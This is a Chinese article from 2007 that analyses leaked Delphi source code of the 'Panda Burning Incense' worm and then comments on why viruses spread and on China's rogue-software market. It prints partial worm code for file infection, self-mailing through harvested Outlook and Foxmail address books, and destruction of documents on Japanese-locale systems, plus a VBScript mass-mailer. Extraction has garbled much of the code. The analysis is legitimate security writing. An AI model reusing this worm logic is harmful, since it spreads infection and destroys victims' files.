熊猫烧香源码解析

admin管理员组

文章数量:1531279

2024年3月22日发(作者：)

熊猫烧香源码解析

2007-02-27 12:59 朱先忠 IT168 我要评

论(1)

摘要：随着“熊猫烧香”病毒的始作俑者的落网，关于“熊猫烧香”病毒

的危害和杀毒风波告一段落，然而随着“熊猫烧香”病毒源代码在网上的

流行，一种隐含的巨大的危害仿佛才刚刚开始。本文中，作者对这个基于

Delphi语言所编写的“熊猫烧香源码”做了进一步分析，并阐述了自己

的几点看法。



标签：熊猫烧香 源码 启示





Oracle帮您准确洞察各个物流环节

一、引言

去年秋天回趟老家，适逢家中秋收后“祭宅神”。期间，听亲家二大娘在香毕吟

颂的《十柱香》的佛歌，深有感触：百姓烧香祝的是神仙幸福，盼的是亲人平安

—这是作为衣食百姓发自内心的心愿！但如今，正待举国上下、一家老小庆祝金

猪佳节到来之际，图1中的这位老兄抢先一步把香烧到了几乎家家户户，烧得各

位焦头烂额，人人喊“杀”。

试问这位仁兄：你到底想干什么？

图1：“熊猫烧香”病毒感染可执行文件后的文件图标

在短短一个月时间里，“熊猫烧香”作者多次发布更新版的变种病毒，每一次都

针对以前设计的不完善进行修改，每次更新都几尽感染破坏之能事。他为什么要

如此辛劳地研制病毒程序呢？本人十分同意一些防毒软件专家的观点—“‘熊

猫烧香’带有强烈的商业目的，用户感染病毒后，会从后台点击国外的网站，部

分变种中含有盗号木马，病毒作者可借此牟利„„”。

最近，一份据称是“熊猫烧香”病毒的源代码正在互联网上散播，任何人只要利

用Google或者Baidu等搜索工具都可以轻易获得（本人也是如此取得的代码）。

粗略分析该代码后，我们注意到：该病毒在感染至日文操作系统时破坏性尤甚，

但对其它语言Windows也造成了严重破坏。

本文中，我想对这个基于Delphi语言所编写的“熊猫烧香源码”作进一步分析，

并阐述自己的几点看法。

二、“熊猫烧香”病毒“源码”浅析

(一)主程序段分析

原“熊猫烧香”病毒“源码”主程序段代码如下所示：

{==================主程序开始

====================}

begin

if IsWin9x then //是Win9x

RegisterServiceProcess(GetCurrentProcessID, 1) //

注册为服务进程

else //WinNT

begin

//远程线程映射到Explorer进程

//哪位兄台愿意完成之？

end;

//如果是原始病毒体自己

if CompareText(ExtractFileName(ParamStr(0)),

'') = 0 then

InfectFiles //感染和发邮件

else //已寄生于宿主程序上了，开始工作

begin

TmpFile := ParamStr(0); //创建临时文件„„....Line

n

Delete(TmpFile, Length(TmpFile) - 4, 4);

TmpFile := TmpFile + #32 + '.exe'; //真正的宿主文

件，多一个空格

ExtractFile(TmpFile); //分离之

FillStartupInfo(Si, SW_SHOWDEFAULT);

CreateProcess(PChar(TmpFile), PChar(TmpFile), nil,

nil, True,

0, nil, '.', Si, Pi); //创建新进程运行

之„„....Line n+7

InfectFiles; //感染和发邮件

end;

end.

稍加分析，我们不难绘出其相应的执行流程（如图2）：

图2：主程序流程图

对于代码：

RegisterServiceProcess(GetCurrentProcessID, 1) //

注册为服务进程

虽然源码提供者省略了相应实现，但这是比较基本的编程实现。通过把自身注册

为服务进程，可以使自己随着系统的启动一起启动。当然，还可以进一步施加技

巧而使自己从Windows任务管理器下隐藏显示。

然后，上面代码在判断当前操作系统不是Win9X后，提到“远程线程映射到Explorer

进程”一句。其实这里所用正是Jeffrey Richter所著《Windows 95 Windows NT 3.5高级编程

技术》（后多次更句）一书第16章“闯过进程的边界”中详细讨论的“使用远程线程来注入一

个DLL”技术。如今，只要上网GOOGLE一下“远程线程映射技术”即出现大量实现片断，

故在不再赘述。那么，它（包括其它许多病毒）为什么要映射到Explorer进程呢？原来，

Explorer（注：Windows资源管理器的名字也是，但并不是一回事！）进程在

Windows系统中举足轻重—Windows在启动过程中都会随同激活一个名为的进

程。它用于管理Windows图形外壳，包括开始菜单、任务栏、桌面和文件管理等，损坏或

删除该程序会导致Windows图形界面无法适用。注：这并不是说Windows的运行根本离不

开它；但删除掉这个程序后，整个Windows桌面无法再用，而对于普通用户也感觉到好象

无法再使用Windows了。

另注：VCL函数Paramstr(n)的作用是返回当前可执行文件指定的命令行参数；当n=0

时，返回当前可执行文件名（包含完整的路径）。

因此，上面代码中从第n行到第n+7行的作用是，从已感染的宿主程序中分离出原无

染程序代码部分，并启动此无染程序。这是病毒的重要伪装手段之一：不是一下子使宿主中

毒瘫痪，而是感染宿主使之达到继续传播目标的同时，启动另一个“原”无毒程序（实际上文

件名已经改变，加了一个空格字符）。

接下来，让我们深入分析上面流程中“InfectFiles（感染文件）”部分的执行过程。

(二)具体感染文件的过程

这个子过程的源码如下所示：

{遍历磁盘上所有的文件并实际感染}

procedure InfectFiles;

var

DriverList: string;

i, Len: Integer;

begin

if GetACP = 932 then //日文操作系统。函数GetACP用于检索系统

所用语言

IsJap := True; //去死吧！

DriverList := GetDrives; //得到可写的磁盘列表

Len := Length(DriverList);

while True do //死循环

begin

for i := Len downto 1 do //遍历每个磁盘驱动器

LoopFiles(DriverList + ':', '*.*'); //感染之

SendMail; //发带毒邮件

Sleep(1000 * 60 * 5); //睡眠5分钟—病毒常用简单诈骗术之一

end;

end;{ === InfectFiles }

这里的核心是后面的死循环。先让我们分析较简单的“发带毒邮件”部分。从后面病毒具

体遍历可用磁盘并执行具体感染过程可知，此过程中，它会取得安装在本机中的常用邮件客

户端程序（Outlook，FoxMail）相应电子邮件信息。其目的是：取得重要邮箱地址及相应密

码，然后向这些邮件地址群发带毒的电子邮件，从而达到利用网络传播自身的目的。下面是

从网上摘录的一段VBScript脚本：

Set objOA=Object

（"ation"）

'创建一个OUTLOOK应用的对象

Set objMapi=eSpace（"MAPI"）

'取得MAPI名字空间

For i=1 to

'遍历地址簿

Set objAddList=sLists（i）

For j=1 To objAddList.

Set objMail=Item （0）

（objAddList. AddressEntries （j））

'取得收件人邮件地址

t="你好!"

'设置邮件主题

="这次给你的附件，是我的新文档！"

'设置信件内容

（“c:"）

'把自己作为附件扩散出去

'发送邮件

Next

Next

Set objMapi=Nothing

Set objOA=Nothing

注意，这段代码是非常基本的使用VBScript脚本操作Outlook COM对象，并进而达到

通过编程方式操作Outlook发送特定邮件的编程技术。其中，最关键的一句在

于： （“c:"）

在此，任何一名病毒制作者都可以把这个附件文件名修改为新病毒文件自身！

(三)LoopFiles子过程分析

这个子程序的功能是：遍历本地磁盘，并详细实施感染及破坏过程。在此列出其关键代

码片断：

{ 遍历目录，感染和摧毁文件 }

procedure LoopFiles(Path, Mask: string);

var

//……局部变量定义

Msg: TMsg;

// IsValidDir判断指定对象是否是“目录”……

function IsValidDir(SearchRec: TSearchRec): Integer;

begin

if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then

begin

repeat

PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //调整消息队列，避免

引起怀疑

if IsValidDir(SearchRec) = 0 then

begin

Fn := Path + ;

Ext := UpperCase(ExtractFileExt(Fn));

if (Ext = '.EXE') or (Ext = '.SCR') then //Line X

begin

InfectOneFile(Fn); //感染可执行文件

end

else if (Ext = '.HTM') or (Ext = '.HTML') or (Ext = '.ASP')

then

begin

//感染HTML和ASP文件，将Base64编码后的病毒写入

//感染浏览此网页的所有用户

//哪位大兄弟愿意完成之？

end

else if Ext = '.WAB' then //Outlook地址簿文件

begin

//获取Outlook邮件地址

end

else if Ext = '.ADC' then //Foxmail地址自动完成文件

begin

//获取Foxmail邮件地址

end

else if Ext = 'IND' then //Foxmail地址簿文件

begin

//获取Foxmail邮件地址

end

else

begin

if IsJap then //是倭文操作系统

begin

if (Ext = '.DOC') or (Ext = '.XLS') or (Ext = '.MDB') or

……then

SmashFile(Fn); //摧毁文件

end;

end;

end;

//感染或删除一个文件后睡眠200毫秒，避免CPU占用率过高引起怀疑

Sleep(200);

until (FindNext(SearchRec) <> 0);

end;

FindClose(SearchRec);

SubDir := ;

if (FindFirst(Path + '*.*', faDirectory, SearchRec) = 0)

then

begin

repeat

if IsValidDir(SearchRec) = 1 then

();

until (FindNext(SearchRec) <> 0);

end;

FindClose(SearchRec);

Count := - 1;

for i := 0 to Count do

LoopFiles(Path + s + '', Mask);

FreeAndNil(SubDir);

end;

此子过程是典型的遍历本机中所有可用盘中的所有子目录下的所有文件并施行相应操

作的编码。既如此，那么让我们从Line X开始分析。在确定当前文件为可执行文件（仅针

对.EXE和.SCR文件）后，调用子过程InfectOneFile进行特定的感染。接下来，如果文件为

某些网页（扩展名为.HTM、.HTML和.ASP），则继续感染这些网页文件—在网页最后加入

类似如下的代码段（本代码摘自某君对一种“熊猫病毒”变体的分析结果）：

于是，用户在启动此网页时，即可把URL导航到自己指定的网址（注：读者试验时不

妨修改一下其中的URL，还有width和height等参数，效果会更明显）。接下来，程序进一

步判断如果当前文件是电子邮件客户端程序相应的邮件地址数据文件，则取得这些地址信

息。虽然此处没有说明如何使用它们，但根据普通蠕虫病毒特征，应该是把带有自身（病毒

体）的邮件发送到这些邮件地址，进而达到利用网络传播自身的目的。奇怪的是，等程序执

行（判断）到语句“if IsJap then”处—此时已经对满足前面特征的文件执行完相应的感染或传

播—才判断操作系统是否为日文版本。如果是，则对另外一些常见文件类型

（.DOC、.XLS、.MDB…….AVI）进行彻底破坏（调用过程SmashFile彻底摧毁文件）。看

起来，这位“烧香”仁兄也是一位“爱国主义”分子。只可惜，在“打倒日本帝国主义”之前，你

的广大同胞已经被“焚得焦头烂额”了。

三、“熊猫烧香”源码告诉我们什么？

（一）病毒的编写变得相对越来越容易

记得本人92年刚从学校毕业时，要想深入学习一点DOS内核编程技术，不得不费神“远

程邮寄”参考书。而如今的互联网上黑客教程遍地：XX黑客教程，XX破解教程，各种流行

程序漏洞扫描教程……国内的，国外的，应有尽有。另一方面，微机早已进入普通家庭，这

对各种计算机技术的普及也起到巨大的推动作用。所有这些极大地推动了病毒编写技术的传

播，乃至于几乎人人都能写点病毒，但由于软件编码特有的“细活”之特性，使得不少学习粗

心者“无意插柳柳成荫”。

（二）病毒的传播越来越容易

在上面的代码中，我们注意到如下几点：第一，程序遍历磁盘上邮件地址库把自己作为

电子邮件附件发送出去；第二，病毒感染网页文件（简单地在网页最后加入一小段代码），

致使当前打开此网页时即激活病毒体。这些“作战”手段借助于广泛普及的因特网几乎是一蹴

而就的事情。因而，从这种角度讲，病毒的传播已变得越来越容易。

（三）病毒代码传播的两面性

如今回趟沂蒙老家，在普通农庄以ADSL上网已成趋势，而且这种趋势可能较之于有

线电视传播更为迅速。似本文“熊猫烧香”病毒“源代码”，其效能如同前面所提之各大“教程”；

从其正面看，将极大地推动软件技术的发展和广大软件爱好者的研制技术；但从其消极面看，

对于想制造病毒的人来说，也有相当的技术参考价值。只要稍试修改，很多“好事者”都可以

藉此制造出病毒变种，说不定哪天又来个“鼠年喊打鼠”，“牛年喊杀牛”。

总之，网络是把双刃，或者说技术是把双刃剑，这在计算机软件业已得到最充分的认证！

于此，作者也不由得灵光一现：如果说“护花使者”类软件在国内外极受广大家长用户的欢迎，

那么，研究一款辅助警方缉拿这等网络犯罪的共享软件，也必定受宠（提及此，我们不由得

再发感叹：也许还是国人软件法不健全，抑或是另有苦衷？网络犯罪岂是来无影去无踪般神

话？）。各位仁君不妨一试。

（四）“流氓软件” 离病毒仅一步之遥

且看中国互联网协会公布的流氓软件官方定义：

恶意软件定义：是指在未明确提示用户或未经用户许可的情况下，在用户计算机或其他

终端上安装运行，侵犯用户合法权益的软件，但已被我国现有法律法规规定的计算机病毒除

外。其具体特征包括：强制安装、难以卸载、浏览器劫持、广告弹出、恶意收集用户信息、

恶意卸载、恶意捆绑以及其他侵犯用户知情权、选择权的恶意行为。

本人从网上也看到此“熊猫烧香”病毒作者留言的病毒制作“动机”，但从该病毒其它版本

频繁从后台启动国外指定网页的行为来看，确有其明确的商业动机。中国软件市场之混乱，

犹如计算机病毒之“毒瘤”，改革开放之“腐败”毒瘤，不治将恐甚。因此，从最近“熊猫烧香”

新版的“金猪闹春”发展势头来看，纵使该作者在论坛上透露将终止继续研发新版本，但国软

市场之混乱加上有其巨大的商业利益驱动，他岂能就此罢手？

如今，网上大批特批“流氓软件”，“灰色软件”。请问：这样的日子何时是个尽头？恕在

下直言，如果不从根本上整顿国软市场之混乱局面，类似这种在网上疯传的“熊猫烧香”之“源

码”必使“灰色软件”愈灰，“流氓软件”之愈流氓！

四、小结

如今网上流传的“熊猫烧香源码”，不由得不引发人们无尽的思考。我想，联系中国特色

的软件市场来认识这样的问题似乎更为合适。“熊猫”、“烧香”本来各自是美好事物和良好祝

福的象征，现在却不由得不令人心焦。权当本文系在下之胡言乱语。最后，谨祝各位：金猪

之年财运望，发良财，发洋财，而不是发横财！

本文标签： 病毒烧香文件感染